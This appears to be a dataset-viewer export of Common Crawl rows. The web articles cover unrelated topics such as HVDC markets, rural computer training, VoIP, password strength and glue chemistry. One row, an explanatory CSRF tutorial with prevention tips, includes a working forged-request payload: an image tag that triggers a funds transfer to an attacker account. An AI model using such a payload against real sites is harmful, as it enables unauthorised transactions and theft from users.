text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
Introduction of High Voltage Direct Current (HVDC) transmission has revolutionized the existing power system in India. The biggest advantage being ease of long distance and bulk power transmission, it has facilitated the transmission of electricity from power rich states to power deficit states which co-incidentally happen to be economically poor and economically rich respectively. Quest for clean and renewable power is increasing globally year by year. Governments are looking at different ways to solve their energy crisis; interconnection of HVDC systems is one in that. Lots of investment is going into connecting different power grids and thousands of Megawatts of power is being sent everyday across these grids. The first long distance High Voltage Direct Current was sent in 1882 over 57 km and only 1.5kW was sent in Germany. Now the longest transmission is the Rio Madeira transmission link in Brazil which has a length of 2385km and sends 7.1GW of power. In these 130 years the concept of Direct Current has again come into relevance with people realising its advantages over long distance transmission and how the problems that were earlier faced can be overcome. Thomas Edison popularised the concept of DC everywhere but it never really caught the imagination of the people. Now after numerous researches and new innovations in this field, the industries are again looking at HVDC to overcome the problems of HVAC transmission. The average size of the HVDC transmission systems has increased in the recent years. The market for this transmission system is also increasing with more countries getting involved with the project and installing more HVDC grids. HVDC has various advantages like for long distances it is much cheaper to transmit power, the transmission losses are less for larger distances, they do not have any maximum transmission distance and one of the very big advantage is that it allows the power to be transferred from one AC grid to another having different frequencies. This helps in linking incompatible grids, brings stability and increases the economy. The main concerns with HVDC are that its converter stations are expensive and the system of controlling the power flow must be well communicated so the multi-terminal systems are costly. There are big companies getting involved in the HVDC market and are coming up with innovative ideas to solve some of the issues concerning this market. In HVDC the basic process at the transmitting end is to convert the AC to DC and at the receiving end convert this DC back to AC. These conversions can be done by using rectifiers and inverters. The other important devices used in this are filters, thyristors, Insulated Gate Bijunction Transistor (IGBT) and Voltage Source Converter (VSC). There is a lot of research going on in the VSC field because it is one of the key aspects to reduce the losses. The power can be sent by overhead lines or undersea cables. What the Report Offers 1) Market Definition for the specified topic along with identification of key drivers and restraints for the market. 2) Market analysis for the HVDC transmission systems Market, with region specific assessments and competition analysis on a global and regional scale. 3) Identification of factors instrumental in changing the market scenarios, rising prospective opportunities and identification of key companies which can influence the market on a global and regional scale. 4) Extensively researched competitive landscape section with profiles of major companies along with their share of markets. 5) Identification and analysis of the Macro and Micro factors that affect the HVDC transmission systems market on both global and regional scale. 6) A comprehensive list of key market players along with the analysis of their current strategic interests and key financial information.
<urn:uuid:7297ca54-9244-433c-a113-11938dd87305>
CC-MAIN-2017-04
https://www.mordorintelligence.com/industry-reports/india-hvdc-transmission-systems-market-industry
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279650.31/warc/CC-MAIN-20170116095119-00521-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952336
740
3.375
3
For some states, economic development is more than bringing jobs to a region to lower the unemployment rate: It's about saving small towns from extinction. North Dakota is one of those states, and economic-development officials hope to save as many rural towns as possible from dying a slow death. For many of the state's rural residents, those small towns offer the only avenue to basic services, such as doctors, other health-care providers and even grocery stores. "When people start leaving, there's no one to provide services," said Tara Holt, director of Women and Technology , a unit of the Bismarck-based Center for Technology and Business. She cited Rugby, N.D., as a prime example of this scenario. "This is a community that sees that they would be faced with extinction if they didn't get out and create some new opportunities for the people who live in the community," Holt said. "In Rugby, the hospital has led the way. The administration has taken an old nurses' dorm and created a technology lab in that dorm." Holt said the hospital has long had a problem in getting licensed practical nurses (LPNs), so hospital brass created a system to work with a community college to educate nursing students from smaller communities so they can become LPNs. "The skill of a 12-hour class translates into so much more," Holt said. "Now, you've got a vibrant community. You've got a hospital that's going to have employees. They've taken this whole thing out into the community; this community runs seven different classes per week, with probably 12 people in each class. They've changed their mentality, and technology is the basis of so many thing that the community relies on to stay alive." Starting at Square One Holt has organized a series of technology training courses for residents of rural towns for the last two years, and the training classes have reached approximately 7,000 people. "I traveled into rural areas and went into businesses, and one of the things that I saw was that a lot of them had computers," she said. "But, if you started talking to them about what they used them for, guess what -- they had computes, but they didn't use them. They had no one to ask." Getting such training to a rural population is difficult, Holt said, given that many of the people who need the training live three or four hours from the nearest city. Another problem was actually convincing the people that technology can be beneficial. "We needed to change the mentality of everyone in the rural areas because there was a fear of technology, instead of embracing and using [it] to make things better," she said. "They really had a tendency to either pooh-pooh it or to damn it, because they didn't know about it." The center's community computer training classes offer rural residents four courses: the introductory course; the intermediate course; the "Power-Up with Projects" course; and a "Build the Future Web Design" course. Trainers work with all ages of people, from children all the way to senior citizens. "We wrote our own curriculum," she said. "We boiled it down to the simplest elements - here's what you have to know to run a computer - and left out all the extra things you don't need to know. We printed our books in a 14-point font, which may be a small thing, but it's turned into such a friendly thing, especially for senior citizens when they're looking back and forth between a book and a screen." Once the curriculum was developed, Holt and her staff had to look for a place to test the effectiveness of the training programs. "We found a community, Hettinger, in southwestern North Dakota, down in a corner where they're just desperate for anything," she said. "I thought we'd have about 20 students, and we had about 250 in the first few months. The community has a population of 1,200." The sheer demand forced Holt to rethink her strategy of how to best reach rural residents, so she devised a plan where her staff trained key people to be able to go out and train other people. Finding the right people to take on the role of trainer was critical to the success of the community training classes. "Every community has a few people who have decent computer skills, but, beyond that, are also good communicators and are respected in their community," she said. "In a rural area, if your peers don't respect you and you're teaching a class, they won't come. Finding those people was key to what we're doing." Maintaining the Momentum The need to press on in training efforts across the state is imperative, said Orlin Hanson, Economic Development Director of the Renville County Job Development Authority. "This whole northwestern part of North Dakota is in dire shape," Hanson said. "The two counties right to the West of me - Burke County and Divide County - lost 25 percent of their population over the last 10 years. A good share of that is young couples leaving. My county lost 17 percent over the same course of time." The first step to economic vitality in rural areas is developing a skilled workforce, he said, and luring companies to the state depends on having such a workforce ready. "We're trying to promote economic development, and the best way we're going to do that is with private enterprise -- somebody who has a chance to make a profit," he said. "Profit is the greatest motivating factor that mankind has ever come up with. That's what we're trying to do out here -- getting a trainable workforce so those people who see they can make a profit, they'll come in." Hanson, who lost his ranch in 1996, started as the economic development director approximately two years ago. "I told the board, 'If I take it, my first objective is getting everybody, and I mean everybody, on computers and the Internet,'" he said. "We started running computer classes that winter in three little towns, and we had 189 people take the introductory and intermediate computer courses." Holt's group of instructors trained the instructors who ultimately taught the 189 people who took the classes. "We might be rural, but we're not isolated anymore," Hanson said. Shane Peterson, News Editor
<urn:uuid:46a422cf-f97a-4b8b-8e6c-cdc735608bc3>
CC-MAIN-2017-04
http://www.govtech.com/magazines/gt/Tug-of-War.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00337-ip-10-171-10-70.ec2.internal.warc.gz
en
0.983351
1,308
2.734375
3
In 1876 Alexander Graham Bell made the first telephone calls using electrical signals conducted over telegraph wires. The Bell Telephone Company was founded in 1877 and by 1886 more than 150,000 people in the U.S. owned a telephone. Since these early pioneering days innovation in telecommunications has grown at an incredible pace and today generates vast quantities of associated data that is collected and stored by telecommunications companies as ‘Big Data’. In his book ‘The Rise of Humans: How to outsmart the digital deluge’, David Coplin, Chief Envisioning Officer at Microsoft UK, suggests that the biggest change we have undertaken over the last 10 years is that we no longer use technology just to connect over great distances, we are increasingly using it to connect when the distances are inconsequential, thus generating a rising tide of ‘Big Data’. Big Data in Telecoms is a broadly used term that references both the quantity of data being generated and stored within the industry and the data analysis techniques for extracting business intelligence from that data. Within the industry there are many approaches used to derive meaning from the data sets, and there are many challenges also. These include the storage of data in silos that are not linked, the complexity of the applications available to mine the data, and the lack of in-house knowledge to interpret the results and derive actionable meaning from them. Additionally, Big Data analysis is resource intensive and tends to produce generalisations, in part due to the difficulty in ensuring that the source data is accurate and contextually relevant. In recent online discussions some new ideas are emerging that help to produce more focussed and relevant results through the use of smaller, more consolidated data sets. This technique is being termed Smart or Skinny Data. The benefits are that researchers can be more confident that the results being produced come from relevant data sets because irrelevant data has not been included. Today’s increasing diversity of channels, devices and digital touch points is generating higher degrees of complexity which continue to inhibit our understanding of data, and whilst this may in itself be a headache it is also an opportunity to gain real business intelligence. According to McKinsey, many organizations have yet to fully exploit the data or analytics capabilities they currently possess. So how would you go about taking advantage of the data you already have – or ‘Skinny Data’ as we now refer to it. This boils down to empowering a wide range of business users across you organization to access, understand and build insights from easily accessible data sources in a quick and easy format. Here at CTI Group we have taken ‘Skinny Data’ to heart and by consolidating data from targeted data sources the sample data set is smaller and more relevant to the task in hand. This leads to several benefits. Firstly, the speed with which data can be analysed is much greater, making real-time analysis a reality. Secondly, using a consolidated and summarised data set requires less storage and resource to process. Thirdly the results are reliable and relevant and can easily be interpreted by staff with little or no training in data analysis.
<urn:uuid:f702ec5f-d8c0-4465-8517-37d73f246155>
CC-MAIN-2017-04
http://www.ctigroup.com/ctigroupblog/2015/2/3/the-value-of-skinny-data-in-an-era-of-big-data
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284411.66/warc/CC-MAIN-20170116095124-00547-ip-10-171-10-70.ec2.internal.warc.gz
en
0.953394
631
2.734375
3
Cell phones gear up to fight AIDS Grid computing is nothing new. In one model of this kind of shared computing, people download programs that allow their computers or laptops to donate computing cycles to projects when the machines are otherwise idle. Scientists with big computing problems can upload a computational problem to a central server, and that server then takes advantage of all the idle computers to crunch numbers and work out a solution. In the past, this kind of volunteer computing has been done with desktops and laptops, because only they had enough power to make things worthwhile. But now that smartphones are almost as powerful as desktop computers, the folks over at IBM's World Community Grid and the Olsen Laboratory plan to leverage the power in everyone’s back pocket. They have developed an app to distribute the computational burden related to finding new drugs that can combat resistant strains of AIDS. To participate in the program, users simply download the Android app and install it on their phone. Thereafter, the smartphone will be sent problems and use its idle processing power to work out solutions. Even though today's phones are powerful, they still face limitations compared to desktop computers. According to the scientists working on the project, phones will only accept problems when they are connected to a Wi-Fi network, are close to fully charged and are plugged into an AC outlet. That way the project won't drain the battery or rack up usage charges. Basically, the phones will mostly be used at night when they are at home and being charged up. Although users likely won't notice their phones chugging away, scientists are hopeful that the idle phones will discover the answer to some pretty complex questions. IBM keeps a running total of how much idle time has been devoted to the project. As of this week, over 30,000 people have downloaded the app and more than 288 years of runtime has been logged. If you've got an Android and some free idle computing cycles, why not help to cure AIDS while you sleep? Posted by John Breeden II on Aug 12, 2013 at 9:33 AM
<urn:uuid:51bd1e26-a21c-4347-8001-34c0ec3fa742>
CC-MAIN-2017-04
https://gcn.com/blogs/mobile/2013/08/fight-aids-at-home-android-app.aspx?admgarea=TC_Mobile
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280761.39/warc/CC-MAIN-20170116095120-00181-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952222
416
3.015625
3
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. As chip designs shrink, following Moore's Law of ever smaller and more powerful microchips, it gets hard for developers to see what is happening. The new technique makes an electron microscope much more powerful, and lets developers look at the atomic structures and properties of the materials used, IBM said in a statement yesterday. Until now, lens imperfections or "aberrations" in electron microscopes have led to blurred images. IBM and Nion have therefore developed a way of correcting the aberrations using seven sets of lenses connected to a computer. After the correction, the microscope can make an electron beam that is only three billionths of an inch wide, which is smaller than a hydrogen atom. The beam can show clear images of the atomic structure of a semiconductor or insulating material and spot any defects, such as missing or extra atoms, according to IBM. With that knowledge, scientists can better evaluate the properties of a material and work on ways to improve it. Understanding how atoms interact with one another could also be useful in developing the conditions for future chips that can self-assemble, IBM said.
<urn:uuid:9e27479e-6348-4583-8d80-5ac45d6d7a8d>
CC-MAIN-2017-04
http://www.computerweekly.com/news/2240046960/IBM-nano-microscope-gives-insight-into-materials
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280410.21/warc/CC-MAIN-20170116095120-00540-ip-10-171-10-70.ec2.internal.warc.gz
en
0.928992
255
3.828125
4
Cisco Named a Leader Cisco is positioned as a leader in the Gartner Magic Quadrant for Unified Communications What is VoIP and What Can it Do for Your Business? VoIP and IP telephony are becoming increasingly popular with large corporations and consumers alike. For many people, Internet Protocol (IP) is more than just a way to transport data, it's also a tool that simplifies and streamlines a wide range of business applications. Telephony is the most obvious example. VoIPor voice over IP is also the foundation for more advanced unified communications applications including Web and video conferencing that can transform the way you do business. What is VoIP: Useful Terms Understanding the terms is a first step toward learning the potential of this technology: - VoIP refers to a way to carry phone calls over an IP data network, whether on the Internet or your own internal network. A primary attraction of VoIP is its ability to help reduce expenses because telephone calls travel over the data network rather than the phone company's network. - IP telephony encompasses the full suite of VoIP enabled services including the interconnection of phones for communications; related services such as billing and dialing plans; and basic features such as conferencing, transfer, forward, and hold. These services might previously have been provided by a PBX. - IP communications includes business applications that enhance communications to enable features such as unified messaging, integrated contact centers, and rich-media conferencing with voice, data, and video. - Unified communications takes IP communications a step further by using such technologies as Session Initiation Protocol (SIP) and presence along with mobility solutions to unify and simply all forms of communications, independent of location, time, or device. (Learn more about unified communications.) What is VoIP: Service Quality Public Internet phone calling uses the Internet for connecting phone calls, especially for consumers. But most businesses are using IP telephony across their own managed private networks because it allows them to better handle security and service quality. Using their own networks, companies have more control in ensuring that voice quality is as good as, if not better than, the services they would have previously experienced with their traditional phone system. Explore the Cisco Unified Communications System Why VoIP? Learn how VoIP can help your small business meet its biggest challenges.
<urn:uuid:8feac72b-23ba-4e63-8793-6df6b364cffc>
CC-MAIN-2017-04
http://www.cisco.com/c/en/us/products/unified-communications/networking_solutions_products_genericcontent0900aecd804f00ce.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281069.89/warc/CC-MAIN-20170116095121-00356-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948415
481
2.65625
3
On July 2, Google became aware of fraudulent certificates that were incorrectly issued to Google-owned domain names. The certificates were issued by National Informatics Centre (NIC) of India, which is a subordinate certification authority (CA) to Indian Controller of Certifying Authorities (India CCA). The miss-issued certificates could have been used to spoof content, perform phishing attacks or perform man-in-the-middle (MITM) attacks. Any fraudulent activity would have limited. The India CCA root certificate is only trusted in Microsoft Windows. It is not permitted for use with Firefox, Android, Apple iOS or OS X. Further, for Google domains it would be detected in Chrome with Windows through public key pinning. The following actions were taken to resolve the problem: - Google blocked the miss-issued certificates in their CRLSets - India CCA revoked the subordinate CA certificate issued to NIC. Google also blocked these revoked certificates - Microsoft updated their Certificate Trust List (CTL) to remove trust of the fraudulent certificates in Windows - Google, through a future Chrome release, will limit trust of the India CCA root to the following domain names: gov.in, nic.in, ac.in, rbi.org.in, bankofindia.co.in, ncode.in and tcs.co.in Although the SSL industry has taken many measures to prevent fraudulent certificates from being issued, we see that it can still happen. When preventative measures do not work, it is argued that a monitoring system is required to allow domain owners to detect when a certificate has been issued for their domain names. The monitoring system at the forefront is called Certificate Transparency (CT), which Google is pushing to be deployed. We will address CT in a future blog post.
<urn:uuid:989894ad-6b0a-44aa-ac4c-ffc53dd6b61b>
CC-MAIN-2017-04
https://www.entrust.com/google-fraudulent-certificates/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00568-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955002
371
2.515625
3
Video remains the densest and most immediate form of human communication for entertaining, persuading, educating or informing. Streaming video is technology that enables content to be delivered to a video player with little to no waiting. In the past, the limitations of connection bandwidth required viewers to trade quality for immediacy. Now, even wireless networks provide enough bandwidth to deliver video at high definition. In our instant gratification society, waiting more than 6 seconds to be entertained, educated or informed can increase the average heart rate by 38%, the same stress level as solving a math problem or waiting at the grocery check-out, states the Ericsson Mobility Report Mobile World Congress edition.1 This is why streaming is now the dominant method of consuming video content, according to IBM Global Business Services.2 CPU and storage-intensive video tasks are increasingly being performed in the cloud, so even mobile devices are able to render high-quality, high-definition video almost anywhere. Around 68% of viewers are watching video content on mobile devices.3 The challenges of delivering video to these devices, with limited storage and over a mobile connection, have resulted in innovative video technologies such as H.265 (High Efficiency Video Coding), HTTP Live Streaming (HLS), MPEG-Dash, and Broadcast over Long-Term Evolution (LTE). Whether streaming video on demand or live, the benefits of video streamed over the cloud is resulting in innovative business uses. Live drone footage of power lines in the Amazon can be used to direct human repair workers efficiently at reduced risk and cost. Public safety video from stadiums can help manage crowds and redirect traffic flow. Employee education can be delivered globally, aligning a multinational workforce around the same corporate messages. Real-time video of medical procedures can focus a high-performing team on a single patient no matter its location. Although digital video is unstructured binary data—unlike other unstructured data—it remains largely off limits to existing analytics tools. While researchers will continue to find ways of delivering video at higher definitions and faster speeds, the most exciting innovations will occur when analytic systems are as fluid at deriving insight from video as they are today from text and images. Only then will these higher order analytics start to really emulate human cognition, possibly even exceeding the human ability to see, process and react to visual stimulation. Today and into the future, video will drive advances in technology, business and society. Becoming video technology literate and embarking on a video strategy is a new imperative for every industry and every enterprise. 1 Ericsson Mobility Report on the Pulse of the Networked Society, Mobile World Congress edition, February 2016. 2 Personal TV, the future of broadcasting, IBM Global Business Services, September 2015.
<urn:uuid:b7273737-95b3-4455-9d57-b26a111a5ffe>
CC-MAIN-2017-04
https://www.ibm.com/cloud-computing/learn-more/what-is-video-streaming/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00108-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918499
552
2.546875
3
OK, maybe the Mars Rover won't find a still, or evidence of a keg party, but Curiosity's analysis of a large rock it's been zapping in order to study its composition has turned up a surprise to scientists. "This rock is a close match in chemical composition to an unusual but well-known type of igneous rock found in many volcanic provinces on Earth," Edward Stolper of the California Institute of Technology in Pasadena, a Curiosity "co-investigator," said Thursday. "With only one Martian rock of this type, it is difficult to know whether the same processes were involved, but it is a reasonable place to start thinking about its origin." The geeky way Stolper explains it here isn't going to blow the socks off a non-geologist. But here's where it gets interesting, at least in a way that might arouse some enthusiasm in your typical underclassman texting his way through a mandatory life sciences course: The formation process an igneous rock (such as the one Curiosity is studying) undergoes is similar to the way applejack liquor was made by colonial Americans. Dude! Stolper explains (as quoted by DiscoveryNews): "You take hard cider, and the way it was made in colonial times is they would put it out in big barrels in the winter and it would freeze -- but not fully, so you'd crystallize out ice and you'd make more and more and more concentrated apple-flavored liquor."This is precisely what happens when you generate a magma on a planet. You generate magma by melting in the interior, it comes to the surface and, just like the applejack, when you cool it, it crystallizes. When it partially crystallizes, it generates a liquid that concentrates particular elements in it that are not in what’s crystallizing." And around the country, thousands of frat boys have settled on their science-lab project. Here's a little primer (courtesy of Popular Mechanics) on what Suite101 calls "America's forgotten liquor." Now read this:
<urn:uuid:f29cd341-94e2-4435-8620-ba3d1806b95e>
CC-MAIN-2017-04
http://www.itworld.com/article/2718707/enterprise-software/how-formation-of-mars-rock-is-similar-to-forgotten-recipe-of-drunken-colonials.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00016-ip-10-171-10-70.ec2.internal.warc.gz
en
0.959488
422
3.140625
3
Cross Site Request Forgery CSRF Attack Explained Cross site request forgery or CSRF attack is one of the Top Ten OWASP Vulnerabilities in a Web Application and quiet challenging during Web Application Penetration Testing . Cross Site Request Forgery is an attack that is caused if the web application allows the visitor to predict the details of a particular action . In CSRF the attacker basically creates a Forged HTTP Request . This Forged HTTP Request forces the user to execute unwanted actions on a website that he trusts and he is currently Authenticated on . That being said , we have 2 main Requirements for a Successful CSRF Attack : - The Web Application accepts the HTTP Requests from the authenticated user without verifying that the request is Unique to the User’s session . CSRF Targets the State Changing requests such as Ticket booking , Funds Transfer , Buy from an online store etc . The forged HTTP request is sent to the victim through Social Engineering techniques . Lets Consider the Example Attack Scenario : The application allows a user to submit a state changing request that does not include anything secret. For example: Now the attacker will construct a Forged HTTP Request that will transfer money from the victim’s account to any account of choice of the attacker, and then embeds this HTTP Request in an image request stored on a website under the attacker’s control: <img src="http://abc.com/bankapp/transferFunds?amount=47840000&destinationAccount=attackersAcct#" width="0" height="0" /> Since nothing is sent in secret , the attacker can create a url of his choice easily .If the victim visits any of the attacker’s website while already authenticated to example.com, these forged requests will automatically include the user’s session info, authorizing the attacker’s request.Hence the money is transffered to the attackers account from the victims account . So in CSRF all it takes is to make you visit a page of attackers choice (which is very easy via social engineering) , and steal money from his bank account or any other action . Prevention of CSRF : - Use Re authentication , CAPTCHA at state changing operations . - Include Unique tokens in the hidden fields . This will send the request in the body of HTTP Request rather than the URL - Always use Multi-Step Transaction in you Website . - Append the Unique token to each link on the requested page . Code Review : If there is no unique identifier (Unique token) relating to each HTTP request , to tie the HTTP request to the user , we are Vulnerable to CSRF Attack . Session ID’s is not enough as it is sent in each HTTP request , legit or forged .
<urn:uuid:951ab024-569d-4d00-875b-2c8fc8f419d8>
CC-MAIN-2017-04
https://www.hackingloops.com/cross-site-request-forgery-attack-for-web-penetration-testing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00016-ip-10-171-10-70.ec2.internal.warc.gz
en
0.865351
576
2.828125
3
Microsoft released the third volume of its popular policymaker booklet, Building Global Trust Online, which includes considerations and guidance for a number of new safety-related topics, including combating human trafficking, online bullying and botnets. You can download, print, and distribute the guide as a 90-page brochure, in individual sections, or as two-page topical guides. Each two-page guide includes a list of resources and links to websites that provide additional support. Each topic in the guide contains an issue overview; a summary of Microsoft’s response to the issue, including technology products, services, and global collaborations, as well as a list of helpful resources and links for further reading and support. Topics addressing cybersecurity include: - Cyber Security – an Overview - Cybersecurity Norms - Critical Infrastructure Protection - Supply Chain Security - Collective Defense: Applying Public Health Models to Internet Security, and - Combating Botnets.
<urn:uuid:0ff1d8da-6215-4f0e-83a4-dde05b72b362>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2013/03/29/microsoft-releases-privacy-and-security-guide-for-policy-makers/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00228-ip-10-171-10-70.ec2.internal.warc.gz
en
0.926904
193
2.578125
3
Gates Cambridge Trust scholar Joseph Bonneau of the university's computer laboratory was given access to 70 million anonymous passwords through internet services firm Yahoo. Using statistical guessing metrics, he trawled them for information, including demographic information and site usage characteristics. Bonneau found that for all demographic groups, password security was low, even where people had to register to pay by a debit or credit card. Proactive measures to prompt people to consider more secure passwords did not make any significant difference. Even people who had had their accounts hacked did not opt for passwords that were significantly more secure. The analysis did find, however, that older users tended to have stronger online passwords than their younger counterparts. German and Korean speakers also had passwords that were more difficult to crack, while Indonesian-speaking users' passwords were the least secure. The main finding of the research was that passwords in general contain only between 10 and 20 bits of security against an online or offline attack. In his research paper, Bonneau concludes that there is no evidence that people, however motivated, will choose passwords that a capable attacker cannot crack. "This may indicate an underlying problem with passwords that users aren't willing or able to manage how difficult their passwords are to guess," he said. Passwords have been argued to be “secure enough” for the web with users rationally choosing weak passwords for accounts of little importance, but the research findings may undermine this explanation, said Bonneau, as user choice does not vary greatly with changing security concerns as would be expected if weak passwords arose primarily due to user apathy. Bonneau will present his findings at a security conference to be hosted by the Institute of Electrical and Electronics Engineers in May. This story was first published by Computer Weekly
<urn:uuid:a6821a5e-6af4-4c5e-9285-228705d0e6ca>
CC-MAIN-2017-04
https://www.infosecurity-magazine.com/news/millions-of-internet-users-trust-weak-passwords/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00136-ip-10-171-10-70.ec2.internal.warc.gz
en
0.981941
358
3.078125
3
Cyanoacrylate is an adhesive also known as instant glue or power glue. Its constituents are methyl 2-cyanoacrylate, ethyl-2-cyanoacrylate,2-octyl cyanoacrylate and n-butyl cyanoacrylate. They have a very short shelf life and have to be used quickly. They have to be used within a month from when the pack is opened and a year after manufacture. They are very strong adhesives and are very fast in their effect. This makes them useful in medical, industrial and household practices. To make it more it more viscous, gel-like and easy to use, it is mixed with substances like fumed silica. Additives like rubber are added to add further strength so that the bond is more impact resistant. They polymerize in the presence of water to make long and strong chains to join the bonded surfaces. When applied thinly in the presence of normal moisture, reaction is rapid and the bond is strong. In electronics, they are used to erect flying model aircrafts, models, prototype electronics and miniatures. Due to their water resistant properties, they are used in aquariums. They are employed for decoration of corals. Its use as a filler requires adding baking soda with it. This is useful in porous materials. Aircraft modellers propeller blades on light aircrafts use this routine. It is used to track fingerprints on non-porous surfaces as a forensic tool. In woodworking, it is used as a fast-drying adhesive which gives a glossy finish. Repair work on piano, wooden instruments and furniture is done by making a mixture of cyanoacrylate with sawdust to fill cracks. This report aims to estimate the Global cyanoacrylate market for 2014 and to project the expected demand of the same by 2019. This market research study provides a detailed qualitative and quantitative analysis of the Global cyanoacrylate market. It provides a comprehensive review of major drivers and restraints of the market. The Global cyanoacrylate market is also segmented into major application and geographies. An in-depth market share analysis, in terms of revenue, of the top companies is also included in the report. These numbers are arrived at based on key facts, annual financial information from SEC filings, annual reports, and interviews with industry experts, key opinion leaders such as CEOs, directors, and marketing executives. A detailed market share analysis of the major players in global cooling fabrics market has been covered in this report. Some of the major companies in this market are Arkema(France), the Dow Chemical Company(U.S.), BASF(Germany), Evonik Industries(Germany), Formosa Plastica Corporation(Taiwan), Sasol Ltd.(South Africa), Zhejiang Satellite Petrochemicals Co.(China), Rhodia S.A.(France) etc. Please fill in the form below to receive a free copy of the Summary of this Report Please visit http://www.micromarketmonitor.com/custom-research-services.html to specify your custom Research Requirement
<urn:uuid:d07e855f-7c43-4427-9f21-a018ed211063>
CC-MAIN-2017-04
http://www.micromarketmonitor.com/market-report/cyanoacrylate-reports-7811365509.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00164-ip-10-171-10-70.ec2.internal.warc.gz
en
0.942857
641
2.671875
3
Lean management failed in the automotive industry because stable systems do not respond well to change. For example, the lead time from requirements to implementation was typically around five years. This lead time prevented American companies from using the most recent technology in automobiles. This lead time was acceptable when change tended to be slow. However, the industry was incapable of responding to sudden changes in customer demand such as fuel economy during the energy crisis of the '70's. The pace of change is amplified a thousand-fold in the software industry. Massive change results from missed requirements, improper design decisions, changing technology, changing competitive landscape. In addition, competition appears suddenly because the barrier to entry for software is much lower than it is for manufactured goods. Paradoxically, phasist process and metrics attempt to fit software development into a stable system by controlling the phases through the artifacts that are created on the passage from phase to phase. In other words, these processes fight the very nature of modern software development based on a false assumption: change can be managed. In addition, here is no evidence that software processes are inherently stable. More likely, it is these processes complexity and unstable dynamics that create bug spirals, cascading missed deadlines and exponential cost of change curves. The spiral software development model, developed at Xerox PARC in the 1980s assumes that feedback and control must continually refine all aspects of the process. Agile methodologies apply the spiral model to build in dynamic mechanisms to leverage the agility of an unstable process. However, like the jet fighter, this agility comes with a cost: non-linear or even chaotic response to input. Agile methodologies must use accurate metrics and feedback to continually adjust the course of the project to keep it from spiraling out of control. For example, extreme programming (XP) uses continual feedback with metrics that assess the creation of customer value as measured in ideal engineering hours. However, this is metric only measures forward progress. XP uses unit tests and task estimates vs. real programming time to ensure that developers are following the proper course. Immediate customer feedback on completed features allows instant evaluation of the completeness of requirements and automation of the tests keeps the course moving forward as there will be no back tracking. However, if any of these metrics are inaccurate or ignored, there is a possibility that the entire project will spiral out of control. Ironically, agile methodologies require systematic and even pedantic application of metrics to adapt to change without spiraling out of control. Much has been written about the difference between agile and 'plan-based' software methodologies. Most of these articles are no more than thinly veiled advocacy for a particular development process without examining the first principles of design. This article discussed software process by applying the fundamental principles of control theory and revealed the fundamental weakness and strength of each approach. Taylorist approaches assume and enforce the stability of the process. This stability allows Gant chart style predictability but mandates strict control of change throughout the process. Agile methodologies allow organizations to meet changing needs and requirements need accurate, instantaneous metrics with feedback and control. Either process can be successful if these assumptions are met. However, in practice most organizations do not have the luxury of controlling change as reality has a way of changing the rules, the game, the goal posts and even the playing field. Most important, modern management techniques, such as Bayesian decision planning, place the emphasis on agile business models that are proactive in changing markets and responding to customers needs before they need them. Leveraging the newest and most powerful technologies quickly and effectively can make or break an organization. Unless the selected process embraces agility and is designed to handle and manage the dynamic stability of the process, agile organizations are doomed to failure. This is the lesson of the auto industry: process must support the corporate strategy and vision. Cost-effective agility that leverages the correct technologies to not only meet but anticipate and consistently exceed the expectations of customers is essential. It is the duty of management to ensure that the selected process supports rather than sabotages these goals. Carmine Magione is chief architect/technologist for Bridge Medical, a developer of patient safety software for the medical industry.
<urn:uuid:4cfe352a-23b0-42b8-a957-cbc1a86de1c3>
CC-MAIN-2017-04
http://www.cioupdate.com/reports/article.php/11050_3546861_2/Pivotal-Decisions-Process-Competition-and-Success.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00558-ip-10-171-10-70.ec2.internal.warc.gz
en
0.940367
854
2.671875
3
